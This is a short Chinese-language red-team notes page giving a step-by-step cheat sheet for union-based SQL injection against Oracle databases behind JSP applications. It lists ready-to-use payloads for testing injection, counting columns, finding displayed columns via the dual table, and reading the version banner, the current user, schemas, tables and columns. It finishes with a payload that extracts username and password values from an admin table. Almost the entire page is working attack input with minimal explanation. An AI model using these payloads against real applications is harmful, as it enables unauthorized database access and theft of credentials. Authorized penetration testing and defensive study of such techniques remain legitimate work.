Oracle+JSP联合注入 · 2022护网笔记

[TOC] ## 联合查询 ~~~ 因为oracle对于类型要求比较严谨，所以要用null可以匹配任意类型 oracle中的dual表是一个单行单列的虚拟表，任何用户均可读取 ~~~ ## 注释符 ~~~ --空格单行注释 /* */ 多行注释 ~~~ ## 判断注入 ~~~ and 1=1 --+ and 1=2 --+ ~~~ ## 判断列数 ~~~ order by 8 --+ ~~~ ## 判断回显位置 ~~~ ' union select null,null,null,null,null,null,null,null from dual --+ ~~~ ## 查看当前数据库版本 ~~~ ' union select 1,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null from dual --+ ~~~ ## 查询当前用户 ~~~ ' union select 1,null,(select user from dual),null,null,null,null,null from dual --+ ~~~ ## 查看当前库名 ~~~ ' union select 1,null,(select owner from all_tables where rownum=1),null,null,null,null,null from dual --+ 查询除已知的库中其他库 ' union select 1,null,(select owner from all_tables where rownum=1 and owner <> '已知的数据库名'),null,null,null,null,null from dual --+ ~~~ ## 查看表名 ~~~ 查看第一个表 ' union select 1,null,(select table_name from user_tables where rownum=1),null,null,null,null,null from dual --+ 查询除已知的表中其他表 ' union select 1,null,(select table_name from user_tables where rownum=1 and table_name <> '已知的表名'),null,null,null,null,null from dual --+ ~~~ ## 查询列名 ~~~ 查询第一列名 ' union select 1,null,(select column_name from user_tab_columns where table_name='表名' and rownum=1),null,null,null,null,null from dual --+ 查询除已知的表中其他表 ' union select 1,null,(select column_name from user_tab_columns where table_name='表名' and rownum=1 and column_name <> '已知的列名'),null,null,null,null,null from dual --+ ~~~ ## 查询数据 ~~~ ' union select 1,null,(select concat(username,password) from admin),null,null,null,null,null from dual --+ ~~~